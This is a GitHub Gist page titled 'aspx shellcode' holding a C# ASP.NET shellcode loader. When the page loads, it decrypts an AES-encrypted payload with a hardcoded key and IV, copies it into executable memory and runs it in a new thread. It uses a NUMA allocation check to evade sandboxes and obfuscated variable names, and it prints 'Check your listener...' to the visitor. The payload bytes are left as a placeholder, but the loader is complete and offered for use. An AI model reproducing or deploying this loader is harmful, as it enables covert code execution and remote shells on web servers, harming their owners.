Created
November 10, 2023 14:48
-
-
Save MzHmO/e4e6a8e86e2bad266bfac6f14d77ca95 to your computer and use it in GitHub Desktop.
aspx shellcode
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
```cs | |
<%@ Page Language="C#" AutoEventWireup="true" %> | |
<%@ Import Namespace="System.IO" %> | |
<%@ Import Namespace="System.Security.Cryptography" %> | |
<script runat="server"> | |
[System.Runtime.InteropServices.DllImport("kernel32")] | |
private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect); | |
[System.Runtime.InteropServices.DllImport("kernel32")] | |
private static extern IntPtr CreateThread(IntPtr lpThreadAttributes,UIntPtr dwStackSize,IntPtr lpStartAddress,IntPtr param,Int32 dwCreationFlags,ref IntPtr lpThreadId); | |
[System.Runtime.InteropServices.DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] | |
private static extern IntPtr VirtualAllocExNuma(IntPtr hProcess, IntPtr lpAddress, uint dwSize, UInt32 flAllocationType, UInt32 flProtect, UInt32 nndPreferred); | |
[ System.Runtime.InteropServices.DllImport("kernel32.dll")] | |
private static extern IntPtr GetCurrentProcess(); | |
private byte[] Decrypt(byte[] data, byte[] key, byte[] iv) | |
{ | |
using (var aes = Aes.Create()) | |
{ | |
aes.KeySize = 256; | |
aes.BlockSize = 128; | |
aes.Padding = PaddingMode.Zeros; | |
aes.Key = key; | |
aes.IV = iv; | |
using (var decryptor = aes.CreateDecryptor(aes.Key, aes.IV)) | |
{ | |
return PerformCryptography(data, decryptor); | |
} | |
} | |
} | |
private byte[] PerformCryptography(byte[] data, ICryptoTransform cryptoTransform) | |
{ | |
using (var ms = new MemoryStream()) | |
using (var cryptoStream = new CryptoStream(ms, cryptoTransform, CryptoStreamMode.Write)) | |
{ | |
cryptoStream.Write(data, 0, data.Length); | |
cryptoStream.FlushFinalBlock(); | |
return ms.ToArray(); | |
} | |
} | |
private static Int32 MEM_COMMIT=0x1000; | |
private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40; | |
protected void Page_Load(object sender, EventArgs e) | |
{ | |
IntPtr mem = VirtualAllocExNuma(GetCurrentProcess(), IntPtr.Zero, 0x1000, 0x3000, 0x4, 0); | |
if(mem == null) | |
{ | |
return; | |
} | |
byte[] Enc = new byte[688] { | |
0x46, <шеллкод> ,0x02 }; | |
byte[] Key = new byte[32] { | |
0x57, 0xef, 0x18, 0x5a, 0x8f, 0xd4, 0x32, 0xbc, 0x4f, 0x39, 0x66, 0x3f, 0x0c, 0x17, 0x0b, | |
0x1e, 0x9e, 0xb4, 0x82, 0x3e, 0x4d, 0x9d, 0xa9, 0x05, 0x90, 0x23, 0xee, 0x03, 0xa7, 0x81, | |
0x5f, 0xdd }; | |
// IV | |
byte[] Iv = new byte[16] { | |
0x6e, 0x8f, 0xa8, 0xdd, 0xe6, 0x8e, 0xe1, 0x10, 0x63, 0x17, 0x11, 0x02, 0xc8, 0xfb, 0x60, | |
0x6b }; | |
byte[] e4qRS= Decrypt(Enc, Key, Iv); | |
IntPtr zG5fzCKEhae = VirtualAlloc(IntPtr.Zero,(UIntPtr)e4qRS.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE); | |
System.Runtime.InteropServices.Marshal.Copy(e4qRS,0,zG5fzCKEhae,e4qRS.Length); | |
IntPtr aj5QpPE = IntPtr.Zero; | |
IntPtr oiAJp5aJjiZV = CreateThread(IntPtr.Zero,UIntPtr.Zero,zG5fzCKEhae,IntPtr.Zero,0,ref aj5QpPE); | |
} | |
</script> | |
<!DOCTYPE html> | |
<html> | |
<body> | |
<p>Check your listener...</p> | |
</body> | |
</html> | |
``` |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment